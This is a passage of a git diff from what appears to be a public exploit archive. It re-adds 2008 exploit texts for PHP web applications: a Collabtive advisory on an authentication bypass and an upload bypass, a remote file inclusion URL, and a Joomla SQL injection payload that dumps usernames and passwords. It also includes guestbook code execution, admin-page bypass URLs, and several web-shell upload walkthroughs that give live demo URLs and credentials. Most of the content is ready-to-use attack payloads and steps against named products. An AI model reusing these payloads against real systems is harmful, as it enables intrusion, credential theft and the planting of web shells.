+CSRF+XSS and timing (JS) can be used to successfully exploit this
+vulnerability in an automated manner.
+
+B) Forceful browsing authentication bypass
+
+An authentication bypass vulnerability exists in
+"/admin.php?action=users&mode=added". Directly pointing to that URL
+shows an error, however at the bottom of the page there is a web
+form that permits to create new users with full privileges.
+
+With this vulnerability an attacker without any valid credentials can
+create a new valid administrator.
+
+Since this vulnerability has been discovered the exploitation
+prerequisites changed as detailed below:
+
+- A bug fix in the latest version 0.4.8 now requires "globals on" in
+order to exploit this vulnerability.
+
+- In version 0.4.6 instead the vulnerability is exploitable regardless
+the "globals" settings.
+
+C) Arbitrary file upload
+
+It's possible to upload arbitrary files with arbitrary extensions.
+An attacker that has not already gained Administration privileges using
+the previously exposed vulnerabilities must be assigned to at least one
+project.
+
+To upload a file go to "/managefile.php?action=showproject&id="
+and add a new file.
+
+If a file with .php extension is uploaded then the mimetype will be
+"php/plain" and the program will change the extension to .txt in order
+to prevent exploitation.
+
+This security control can be bypassed changing the mimetype to
+text/plain, in this way the application will believe that a normal .txt
+file was uploaded and the extension will not be changed.
+
+The uploaded file resides in "/files//_$seed.php".
+
+An authenticated attacker will simply see the seed (and the complete
+filename) using the web interface and can directly execute it.
+
+In case of unauthenticated attackers the filename must be guessed.
+Luckily the make_seed() routine leaks real random proprieties and is
+only based on the time. $seed can be easily bruteforced using values
+that are likely to match the return derived by the microtime() of the
+upload.
+
+private function make_seed()
+{
+    list($usec, $sec) = explode(' ', microtime());
+    $value = (float) $sec + ((float) $usec * 100000);
+    return $value;
+}
+
+As easily understandable $seed can be guessed in really few tries. The
+same vulnerability exists when attaching a file in the "Messages"
+section.
+
+This vulnerability can also be exploited via CSRF.
+
+IV. DETECTION
+
+Collabtive 0.4.8 and possibly earlier versions are vulnerable.
+
+V. WORKAROUND
+
+Proper input validation will fix the vulnerabilities.
+
+VI. VENDOR RESPONSE
+
+No fix available.
+
+VII. CVE INFORMATION
+
+No CVE at this time.
+
+VIII. DISCLOSURE TIMELINE
+
+20080926 Initial vendor contact (No Response)
+20081003 Second vendor contact (No Response)
+20081010 Third vendor contact
+20081010 Vendor response (Fix promised for the end of October)
+20081010 Vendor contact to sync disclosure time (No response)
+20081110 Advisory released (Fix not available)
+
+IX. CREDIT
+
+Antonio "s4tan" Parata, Francesco "ascii" Ongaro and
+Giovanni "evilaliv3" Pellerano are credited with the discovery of this
+vulnerability.
+
+Antonio "s4tan" Parata
+web site: http://www.ictsc.it/
+mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it
+
+Francesco "ascii" Ongaro
+web site: http://www.ush.it/
+mail: ascii AT ush DOT it
+
+Giovanni "evilaliv3" Pellerano
+mail: evilaliv3 AT digitalbullets DOT org
+
+X. LEGAL NOTICES
+
+Copyright (c) 2008 Francesco "ascii" Ongaro
+
+Permission is granted for the redistribution of this alert
+electronically. It may not be edited in any way without mine express
+written consent. If you wish to reprint the whole or any
+part of this alert in any other medium other than electronically,
+please email me for permission.
+
+Disclaimer: The information in the advisory is believed to be accurate
+at the time of publishing based on currently available information. Use
+of the information constitutes acceptance for use in an AS IS condition.
+There are no warranties with regard to this information. Neither the
+author nor the publisher accepts any liability for any direct, indirect,
+or consequential loss or damage arising from use of, or reliance on,
+this information.
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7077.txt b/platforms/php/webapps/7077.txt
index 24e60cda5..1a12813f7 100755
--- a/platforms/php/webapps/7077.txt
+++ b/platforms/php/webapps/7077.txt
@@ -1,14 +1,14 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-  OTManager 2.4 Remote File Inclusion (RFI) Vulnerability
-
-  - Security flaw discovered by Colt7r
-  - CONTACT: colt7r |@| bsdmail.org
-
-  - Affected Software: OTManager 2.4
-  - Risk: HIGH
-  - Exploit: http://host/Admin/ADM_Pagina.php?Tipo=[EVIL CODE]
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-10]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+  OTManager 2.4 Remote File Inclusion (RFI) Vulnerability
+
+  - Security flaw discovered by Colt7r
+  - CONTACT: colt7r |@| bsdmail.org
+
+  - Affected Software: OTManager 2.4
+  - Risk: HIGH
+  - Exploit: http://host/Admin/ADM_Pagina.php?Tipo=[EVIL CODE]
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7078.txt b/platforms/php/webapps/7078.txt
index d67d90597..e6222c4da 100755
--- a/platforms/php/webapps/7078.txt
+++ b/platforms/php/webapps/7078.txt
@@ -1,29 +1,29 @@
-#######################################################
- Joomla Component com_jb2(PostID) SQL-injetion Vulnerability					                
-#######################################################
-
-###################################################
-#[~] Author :  boom3rang 
-#[~] Kosova Hackers Group [www.khg-crew.ws]
-#[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1.
-
-#[!] Module_Name:  com_jb2
-#[!] Script_Name:  Joomla
-#[!] Google_Dork:  inurl:"option=com_jb2 "PostID"
-##################################################
-
---------------------------------------------------------------------------------------------------------------------------------------------------
-#[~] Example:                  
-http://localhost/Path/index.php?option=com_jb2&PostID=[exploit]
---------------------------------------------------------------------------------------------------------------------------------------------------
-#[~] Exploit:            
--9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/*
---------------------------------------------------------------------------------------------------------------------------------------------------
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-11-10]
+#######################################################
+ Joomla Component com_jb2(PostID) SQL-injetion Vulnerability					                
+#######################################################
+
+###################################################
+#[~] Author :  boom3rang 
+#[~] Kosova Hackers Group [www.khg-crew.ws]
+#[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1.
+
+#[!] Module_Name:  com_jb2
+#[!] Script_Name:  Joomla
+#[!] Google_Dork:  inurl:"option=com_jb2 "PostID"
+##################################################
+
+--------------------------------------------------------------------------------------------------------------------------------------------------
+#[~] Example:                  
+http://localhost/Path/index.php?option=com_jb2&PostID=[exploit]
+--------------------------------------------------------------------------------------------------------------------------------------------------
+#[~] Exploit:            
+-9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/*
+--------------------------------------------------------------------------------------------------------------------------------------------------
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7079.txt b/platforms/php/webapps/7079.txt
index 41f24250d..15d288481 100755
--- a/platforms/php/webapps/7079.txt
+++ b/platforms/php/webapps/7079.txt
@@ -1,28 +1,28 @@
- _____   ____   __   __     _       ____        ____    ____ 
-|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
-  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
-  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
-  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
-                                                            
-FREEsimplePHPguestbook (guestbook.php) Remote Code Execution Vulnerability 
-Get Script : http://www.sanusart.com/php/FREEsimplePHPguestbook.zip
-Live Deom : http://www.sanusart.com/php/test/guestbook/guestbook.php
-Exploit :
-         Go http://www.sanusart.com/php/test/guestbook/guestbook.php
-In  ->> Name (required): Write ->> Mahmood
-In  ->> Web site (without http://): Write ->> http://tryag.cc
-In  ->> Message: Write ->> 
-
-After All This Go > http://www.sanusart.com/php/test/guestbook/guestbook.php?tryag=id
-
-See Pictures : 1- http://up1.mlfnt.net/images/7kzeu9l8hdjynjud062.png
-               2- http://up1.mlfnt.net/images/rhcuudvtuzv1i62ovp.png
-
-        ____           _           _           __  __ 
-       / ___|   ___   | |       __| |         |  \/  |
-      | |  _   / _ \  | |      / _` |         | |\/| |
-      | |_| | | (_) | | |___  | (_| |         | |  | |
-       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
-                                      |_____|         
-
-# milw0rm.com [2008-11-10]
+ _____   ____   __   __     _       ____        ____    ____ 
+|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
+  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
+  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
+  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
+                                                            
+FREEsimplePHPguestbook (guestbook.php) Remote Code Execution Vulnerability 
+Get Script : http://www.sanusart.com/php/FREEsimplePHPguestbook.zip
+Live Deom : http://www.sanusart.com/php/test/guestbook/guestbook.php
+Exploit :
+         Go http://www.sanusart.com/php/test/guestbook/guestbook.php
+In  ->> Name (required): Write ->> Mahmood
+In  ->> Web site (without http://): Write ->> http://tryag.cc
+In  ->> Message: Write ->> 
+
+After All This Go > http://www.sanusart.com/php/test/guestbook/guestbook.php?tryag=id
+
+See Pictures : 1- http://up1.mlfnt.net/images/7kzeu9l8hdjynjud062.png
+               2- http://up1.mlfnt.net/images/rhcuudvtuzv1i62ovp.png
+
+        ____           _           _           __  __ 
+       / ___|   ___   | |       __| |         |  \/  |
+      | |  _   / _ \  | |      / _` |         | |\/| |
+      | |_| | | (_) | | |___  | (_| |         | |  | |
+       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
+                                      |_____|         
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7080.txt b/platforms/php/webapps/7080.txt
index 5d2ba56ad..eb5f8c98c 100755
--- a/platforms/php/webapps/7080.txt
+++ b/platforms/php/webapps/7080.txt
@@ -1,46 +1,46 @@
-   1.  +-----------------+-----------------+-----------------+
-   2.  +-----------------+Fresh Email Script+----------------+
-   3.  +-----------------versions: 1.0 to 1.11 - all
-   4.  +-----------------exploits: file inclusion & cookie manipulation
-   5.  +-----------------founder: Don
-   6.  +-----------------date: November 10. 2008
-   7.  +-----------------+-----------------+-----------------+
-   8.  +homepage: http://www.freshscripts.net/index.php?do=catalog&c=featured_scripts_!&i=fresh_email_script
-   9.  +vendor notified ? / no
-  10.  +-----------------+-----------------+-----------------+
-  11.  +[1]
-  12.  +file inclusion+
-  13.  +found in /url.php?tmp_sid=
-  14.  +so like site[dot]com/url.php?tmp_sid=[]
-  15.  +attack description:
-  16.  +The GET variable tmp_sid has been set to http://site[dot]com/some_inexistent_file_with_long_name.
-  17.  +It is possible for a remote attacker to include a file from local or remote resources and
-  18.  +or execute arbitrary script code with the privileges of the web server.
-  19.  +-----------------+-----------------+-----------------+
-  20.  +[2]
-  21.  +cookie manipulation+
-  22.  +found in register.php
-  23.  +By injecting a custom HTTP header or by injecting a META tag,
-  24.  +it is possible to alter the cookies stored in the browser.
-  25.  +Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
-  26.  +By exploiting this vulnerability, an attacker may conduct a session fixation attack.
-  27.  +In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server,
-  28.  +thereby eliminating the need to obtain the user's session ID afterwards.
-  29.  +-----------------+-----------------+-----------------+
-  30.  +vuln:
-  31.  +Email=&Password=1230321email@address.com®ister=Register
-  32.  +-----------------+-----------------+-----------------+
-  33.  +How to fix this vulnerability+
-  34.  +
-  35.  +You need to filter the output in order to prevent the injection of custom HTTP headers or META tags.
-  36.  +Additionally, with each login the application should provide a new session ID to the user.
-  37.  +-----------------+-----------------+-----------------+
-  38.  +greetz to all of my friends
-  39.  +special greetz to milw0rm as well as str0ke!+
-  40.  +
-  41.  +
-  42.  +~#Don 2008
-  43.  +Serbian security analyzer
-  44.  +-----------------+-----------------+-----------------+
-
-# milw0rm.com [2008-11-10]
+   1.  +-----------------+-----------------+-----------------+
+   2.  +-----------------+Fresh Email Script+----------------+
+   3.  +-----------------versions: 1.0 to 1.11 - all
+   4.  +-----------------exploits: file inclusion & cookie manipulation
+   5.  +-----------------founder: Don
+   6.  +-----------------date: November 10. 2008
+   7.  +-----------------+-----------------+-----------------+
+   8.  +homepage: http://www.freshscripts.net/index.php?do=catalog&c=featured_scripts_!&i=fresh_email_script
+   9.  +vendor notified ? / no
+  10.  +-----------------+-----------------+-----------------+
+  11.  +[1]
+  12.  +file inclusion+
+  13.  +found in /url.php?tmp_sid=
+  14.  +so like site[dot]com/url.php?tmp_sid=[]
+  15.  +attack description:
+  16.  +The GET variable tmp_sid has been set to http://site[dot]com/some_inexistent_file_with_long_name.
+  17.  +It is possible for a remote attacker to include a file from local or remote resources and
+  18.  +or execute arbitrary script code with the privileges of the web server.
+  19.  +-----------------+-----------------+-----------------+
+  20.  +[2]
+  21.  +cookie manipulation+
+  22.  +found in register.php
+  23.  +By injecting a custom HTTP header or by injecting a META tag,
+  24.  +it is possible to alter the cookies stored in the browser.
+  25.  +Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
+  26.  +By exploiting this vulnerability, an attacker may conduct a session fixation attack.
+  27.  +In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server,
+  28.  +thereby eliminating the need to obtain the user's session ID afterwards.
+  29.  +-----------------+-----------------+-----------------+
+  30.  +vuln:
+  31.  +Email=&Password=1230321email@address.com®ister=Register
+  32.  +-----------------+-----------------+-----------------+
+  33.  +How to fix this vulnerability+
+  34.  +
+  35.  +You need to filter the output in order to prevent the injection of custom HTTP headers or META tags.
+  36.  +Additionally, with each login the application should provide a new session ID to the user.
+  37.  +-----------------+-----------------+-----------------+
+  38.  +greetz to all of my friends
+  39.  +special greetz to milw0rm as well as str0ke!+
+  40.  +
+  41.  +
+  42.  +~#Don 2008
+  43.  +Serbian security analyzer
+  44.  +-----------------+-----------------+-----------------+
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7081.txt b/platforms/php/webapps/7081.txt
index 770f8fd41..ec99e3d9e 100755
--- a/platforms/php/webapps/7081.txt
+++ b/platforms/php/webapps/7081.txt
@@ -1,64 +1,64 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	AJ Article Auth Bypass Vulnerability
-==============================================================================
-
-	[»] Script:             [ AJ Article ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.ajsquare.com/products/article/ ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 10.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ XPL ]===
-	
-	[»] http://localhost/[path]/admin/user.php
-	[»] http://localhost/[path]/admin/articles.php
-	[»] http://localhost/[path]/admin/articlesuspend.php
-	[»] http://localhost/[path]/admin/site.php
-	[»] http://localhost/[path]/admin/statistics.php
-	[»] http://localhost/[path]/admin/mail.php
-	[»] http://localhost/[path]/admin/category.php
-	[»] http://localhost/[path]/admin/subcategory.php
-	[»] http://localhost/[path]/admin/changepassword.php
-	[»] http://localhost/[path]/admin/polling.php
-	[»] http://localhost/[path]/admin/logo.php
-	[»] ...
-	
-
-
-===[ LIVE ]===
-
-	[»] http://www.ajsquare.com/products/demo/admin/
-
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit();
-===============================================================================
-
-# milw0rm.com [2008-11-10]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	AJ Article Auth Bypass Vulnerability
+==============================================================================
+
+	[»] Script:             [ AJ Article ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.ajsquare.com/products/article/ ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 10.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ XPL ]===
+	
+	[»] http://localhost/[path]/admin/user.php
+	[»] http://localhost/[path]/admin/articles.php
+	[»] http://localhost/[path]/admin/articlesuspend.php
+	[»] http://localhost/[path]/admin/site.php
+	[»] http://localhost/[path]/admin/statistics.php
+	[»] http://localhost/[path]/admin/mail.php
+	[»] http://localhost/[path]/admin/category.php
+	[»] http://localhost/[path]/admin/subcategory.php
+	[»] http://localhost/[path]/admin/changepassword.php
+	[»] http://localhost/[path]/admin/polling.php
+	[»] http://localhost/[path]/admin/logo.php
+	[»] ...
+	
+
+
+===[ LIVE ]===
+
+	[»] http://www.ajsquare.com/products/demo/admin/
+
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7082.txt b/platforms/php/webapps/7082.txt
index fdce1f1a1..983681d58 100755
--- a/platforms/php/webapps/7082.txt
+++ b/platforms/php/webapps/7082.txt
@@ -1,63 +1,63 @@
-PHP Store Auto Classifieds Remote File Upload
-
-Author: ZoRLu  msn: trt-turk@hotmail.com
-
-home: www.z0rlu.blogspot.com
-
-N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-
------------------------------------------
-
-
-exploit:
-
-
-first register to site 
-
-you add this code your shell to head 
-
-GIF89a; 
-
-example your_shell.php:
-
-GIF89a;
-
-
-and save your_sheell.php
-
-login to site and edit your profile
-
-upload your_shell.php 
-
-your_shell.php path:
-
-localhost/script/cars_images/[ID]_logo_your_shell.php
-
----------------------------------------------
-
-example for demo:
-
-login: http://www.phpstore.info/demos/cars/login.php
-
-user: zorlu
-
-passwd: zorlu1
-
-shell:
-
-http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php
-
-
-------------------------------------------------
-
-thanks: str0ke & yildirimordulari.org  &  darkc0de.com
-
-# milw0rm.com [2008-11-10]
+PHP Store Auto Classifieds Remote File Upload
+
+Author: ZoRLu  msn: trt-turk@hotmail.com
+
+home: www.z0rlu.blogspot.com
+
+N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+
+-----------------------------------------
+
+
+exploit:
+
+
+first register to site 
+
+you add this code your shell to head 
+
+GIF89a; 
+
+example your_shell.php:
+
+GIF89a;
+
+
+and save your_sheell.php
+
+login to site and edit your profile
+
+upload your_shell.php 
+
+your_shell.php path:
+
+localhost/script/cars_images/[ID]_logo_your_shell.php
+
+---------------------------------------------
+
+example for demo:
+
+login: http://www.phpstore.info/demos/cars/login.php
+
+user: zorlu
+
+passwd: zorlu1
+
+shell:
+
+http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php
+
+
+------------------------------------------------
+
+thanks: str0ke & yildirimordulari.org  &  darkc0de.com
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7083.txt b/platforms/php/webapps/7083.txt
index f88e67731..7dfe58ac7 100755
--- a/platforms/php/webapps/7083.txt
+++ b/platforms/php/webapps/7083.txt
@@ -1,64 +1,64 @@
-PHPStore Job Search Remote File Upload
-
-Author: ZoRLu  msn: trt-turk@hotmail.com
-
-home: www.z0rlu.blogspot.com
-
-N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-
------------------------------------------
-
-
-exploit:
-
-
-you add this code your shell to head 
-
-GIF89a; 
-
-example your_shell.php:
-
-GIF89a;
-
-
-and save your_sheell.php
-
-you register site and this site questions your photo. you upload your_shell.php
-
-you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php )
-
-you must see your photo 
-
-and right click to your photo select to properites 
-
-after copy photo link and paste your explorer go your shell
-
-your_shell.php
-
-http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php
-
-
----------------------------------------------
-
-example for demo:
-
-shell: ( not permission for demo server )
-
-http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php
-
-
-http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php )
-
-------------------------------------------------
-
-thanks: str0ke & yildirimordulari.org  &  darkc0de.com
-
-# milw0rm.com [2008-11-10]
+PHPStore Job Search Remote File Upload
+
+Author: ZoRLu  msn: trt-turk@hotmail.com
+
+home: www.z0rlu.blogspot.com
+
+N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+
+-----------------------------------------
+
+
+exploit:
+
+
+you add this code your shell to head 
+
+GIF89a; 
+
+example your_shell.php:
+
+GIF89a;
+
+
+and save your_sheell.php
+
+you register site and this site questions your photo. you upload your_shell.php
+
+you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php )
+
+you must see your photo 
+
+and right click to your photo select to properites 
+
+after copy photo link and paste your explorer go your shell
+
+your_shell.php
+
+http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php
+
+
+---------------------------------------------
+
+example for demo:
+
+shell: ( not permission for demo server )
+
+http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php
+
+
+http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php )
+
+------------------------------------------------
+
+thanks: str0ke & yildirimordulari.org  &  darkc0de.com
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7084.txt b/platforms/php/webapps/7084.txt
index eddfba4aa..a7b2a7a61 100755
--- a/platforms/php/webapps/7084.txt
+++ b/platforms/php/webapps/7084.txt
@@ -1,63 +1,63 @@
-PHPStore Complete Customizable Classifieds Remote File Upload
-
-Author: ZoRLu  msn: trt-turk@hotmail.com
-
-home: www.z0rlu.blogspot.com
-
-N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-
------------------------------------------
-
-
-exploit:
-
-
-first register to site 
-
-you add this code your shell to head 
-
-GIF89a; 
-
-example your_shell.php:
-
-GIF89a;
-
-
-and save your_sheell.php
-
-login to site and Add Listing click open the new page upload logo (upload your_shell.php)
-
-your_shell.php path:
-
-localhost/script/yellow_images/[ID]_logo_your_shell.php
-
----------------------------------------------
-
-example for demo:
-
-login: http://www.phpstore.info/demos/cars/login.php
-
-user: zorlu
-
-passwd: zorlu1
-
-shell: ( not permission for demo server )
-
-http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php 
-
-
-http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php )
-
-------------------------------------------------
-
-thanks: str0ke & yildirimordulari.org  &  darkc0de.com
-
-# milw0rm.com [2008-11-10]
+PHPStore Complete Customizable Classifieds Remote File Upload
+
+Author: ZoRLu  msn: trt-turk@hotmail.com
+
+home: www.z0rlu.blogspot.com
+
+N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+
+-----------------------------------------
+
+
+exploit:
+
+
+first register to site 
+
+you add this code your shell to head 
+
+GIF89a; 
+
+example your_shell.php:
+
+GIF89a;
+
+
+and save your_sheell.php
+
+login to site and Add Listing click open the new page upload logo (upload your_shell.php)
+
+your_shell.php path:
+
+localhost/script/yellow_images/[ID]_logo_your_shell.php
+
+---------------------------------------------
+
+example for demo:
+
+login: http://www.phpstore.info/demos/cars/login.php
+
+user: zorlu
+
+passwd: zorlu1
+
+shell: ( not permission for demo server )
+
+http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php 
+
+
+http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php )
+
+------------------------------------------------
+
+thanks: str0ke & yildirimordulari.org  &  darkc0de.com
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7085.txt b/platforms/php/webapps/7085.txt
index 5ccbd8e6d..d41d43822 100755
--- a/platforms/php/webapps/7085.txt
+++ b/platforms/php/webapps/7085.txt
@@ -1,61 +1,61 @@
-PHP Store Real Estate Remote File Upload
-
-Author: ZoRLu  msn: trt-turk@hotmail.com
-
-home: www.z0rlu.blogspot.com
-
-N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-
------------------------------------------
-
-
-exploit:
-
-
-first register to site 
-
-you add this code your shell to head 
-
-GIF89a; 
-
-example your_shell.php:
-
-GIF89a;
-
-
-and save your_sheell.php
-
-login to site and edit your profile
-
-upload your_shell.php 
-
-your_shell.php path:
-
-localhost/script/re_images/[ID]_logo_your_shell.php
-
----------------------------------------------
-
-user: zorlu
-
-passwd: zorlu1
-
-shell: ( not permission for demo server )
-
-http://www.phpstore.info/demos/realty/re_images/1226243945_logo_c.php
-
-
-http://www.phpstore.info/demos/realty/re_images/ ( you look here and see shell 1226243945_logo_c.php )
-
-------------------------------------------------
-
-thanks: str0ke & yildirimordulari.org  &  darkc0de.com
-
-# milw0rm.com [2008-11-10]
+PHP Store Real Estate Remote File Upload
+
+Author: ZoRLu  msn: trt-turk@hotmail.com
+
+home: www.z0rlu.blogspot.com
+
+N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+
+-----------------------------------------
+
+
+exploit:
+
+
+first register to site 
+
+you add this code your shell to head 
+
+GIF89a; 
+
+example your_shell.php:
+
+GIF89a;
+
+
+and save your_sheell.php
+
+login to site and edit your profile
+
+upload your_shell.php 
+
+your_shell.php path:
+
+localhost/script/re_images/[ID]_logo_your_shell.php
+
+---------------------------------------------
+
+user: zorlu
+
+passwd: zorlu1
+
+shell: ( not permission for demo server )
+
+http://www.phpstore.info/demos/realty/re_images/1226243945_logo_c.php
+
+
+http://www.phpstore.info/demos/realty/re_images/ ( you look here and see shell 1226243945_logo_c.php )
+
+------------------------------------------------
+
+thanks: str0ke & yildirimordulari.org  &  darkc0de.com
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7086.txt b/platforms/php/webapps/7086.txt
index 73ca919db..ece86f4f5 100755
--- a/platforms/php/webapps/7086.txt
+++ b/platforms/php/webapps/7086.txt
@@ -1,72 +1,72 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	AJSquare Free Polling Script (DB) Multiple Vulnerabilities
-==============================================================================
-
-	[»] Script:             [ AJSquare Free Polling Script DataBase Version ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ]
-	[»] Type:               [ Free ]
-	[»] Report-Date:        [ 10.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ XPL ]===
-
-	[1][!] Blind SQLi (MQ = off)
-		[»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/*		True
-		[»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/*		False
-		
-		[../admin/include/newpoll.php]
-		
-			
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit();
-===============================================================================
-
-# milw0rm.com [2008-11-10]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	AJSquare Free Polling Script (DB) Multiple Vulnerabilities
+==============================================================================
+
+	[»] Script:             [ AJSquare Free Polling Script DataBase Version ]
+	[»] Language:           [ PHP ]
